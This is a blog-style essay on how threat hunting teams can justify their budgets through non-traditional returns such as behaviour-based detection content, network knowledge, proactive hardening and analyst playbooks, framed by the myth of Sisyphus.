Cyber security can often seem Sisyphean. For those of you without a misspent youth, Sisyphus was a character from Greek myth that cheated death twice. The gods punished him by having him roll a heavy boulder up a hill only to have it roll down again. This condemnation was to last an eternity. In fact, he is likely still doing it to this day, and I am sure threat hunting teams can sympathize. Especially, when it comes time for security budgeting.
Every year threat hunting teams face a similar battle when it comes time to justify their budget. Especially if those teams are just getting started. That justification can often be as difficult as Sisyphus’ effort. This is because those hunt teams face the task of discovering unknown threats. And success measured by the unknown can be hard.
Unlike Sisyphus, hunt teams don’t have to face this fate for an eternity. Instead, those teams need to capitalize on the opportunity. These teams can explore not only the traditional ROI models, but also the non-traditional ROI that threat hunting brings to the table. This gives them the opportunity not only to justify their budget, but also edify the critical role that threat hunting plays.
What is Traditional ROI?
Before we can define non-traditional ROI, or return on investment, it is helpful to understand what traditional ROI is. Traditional ROI calculates revenue generated against total expenses for a given effort. Calculating ROI uses the simple formula:
ROI = Revenue / Cost
If a marketing department hosts ads with different providers, they can measure the number of sales generated. They would then divide that by the cost for listing those ads. For a business, a good outcome is if the ROI higher then 1, meaning that the effort made money. After all, businesses are in the business (so-to-speak) of making money.
Traditional ROI vs Cyber Security
Security teams generally can face a unique challenge with this equation. Certainly, security teams can define the “cost” of their operation. This figure includes the people, products, tools, and training that they pay for every year. But, unlike other business departments, cyber security doesn’t produce a revenue. This can make it hard for senior business leaders to justify the considerable expenses these teams often consume from the budget.
Cyber security teams have come up with innovative solutions to this problem. They can measure the number of “attacks” an appliance denies; or, the number of incidents handled. However, this traditional approach often doesn’t work “well” for threat hunting. That is when non-traditional ROI comes into play.
Non-Traditional ROI for Threat Hunting
Non-traditional ROI instead posits that the “return” isn’t always a monetary return on investment. Instead, organizations must consider other ancillary benefits that an effort produced. Marketing efforts could build brand awareness. Charity efforts could build good will and reputation. These are things that can’t be easily quantified, but they are nonetheless important for companies. Threat hunting is the same.
Threat hunting should, of course, yield detections as well. But business leaders need to consider it is the broader benefits that threat hunting provides as well.
Non-Traditional ROI — Threat Detection Content.
The number one outcome hunting contributes to non-traditional ROI is threat detection content. Despite security teams spending huge sums on new “next generation” technology, much of this technology still relies on IOCs. This reliance on indicators often means one thing. These new tools, despite being more technically advanced, end up producing the same results as the old ones. But mature hunt teams are able to “short circuit” this challenge from the outcomes of their hunts.
When hunt teams find something malicious that slipped through, they will build detection content for it. This detection content shouldn’t rely on simple indicators, but rather complex behaviours. With this type of detection content, security teams are better able to detect unknown threats. This type of non-traditional ROI is invaluable for security teams.
Non-Traditional ROI — Know Your Ground.
One of the more significant sources of non-traditional ROI that threat hunting provides is knowledge. This is because hunt teams have to become intimately familiar with their hunting grounds. This means that hunters are often best equipped to answer questions like:
- What is this device?
- Is this activity normal?
- Is this application authorized?
- Is this normal behaviour?
This type of guidance will save security teams large amounts of time and effort. That time and effort serves as a great source of non-traditional ROI.
Non-Traditional ROI — Hardening the Defenses.
Cyber security folks are, by their very nature, curious. None more so than threat hunters. It’s assured that in the course of their work hunt teams will end up in the darkest corners of a network. They will also inevitably end up looking at logs for devices that organizations didn’t even knew existed. This means that it is a certainty that they will discover systems, devices, and controls that have been misconfigured, or worse.
This effort means that organizations are able to correct these mistakes proactively. And more importantly, before an adversary can exploit it. This proactive effort reduces organizations’ attack surfaces, while ensuring defenses are configured properly.
Non-Traditional ROI — Playbook Builders & Force Multipliers.
Hunt teams are a key resource to contribute to internal process documentation around analysis. This is because well-seasoned hunt teams have “seen it all” and have likely “documented it all” too in their hunt plans. These written documents can serve as force multipliers. This is because those hunt plans can serve as an integral source of truth that analysts can learn from and use as a reference. Savvy SOCs can also use those hunt plans to build out the often-missing analyst-focused playbooks.
This type of non-traditional ROI can often yield exponential gains in the time that it saves analysts.
Cyber security disciplines struggle with demonstrating a return on investment using traditional models. None more so than threat hunting, as the practice is geared towards unknown threats. This type of barrier can seem insurmountable especially when trying to justify annual budget. But, security teams should use this challenge instead as an opportunity. This allows security teams to highlight the benefits that threat hunting can have for non-traditional ROI. The non-traditional ROI that threat hunting provides can simplify future budget justifications… And put an end to rolling the rock up that hill.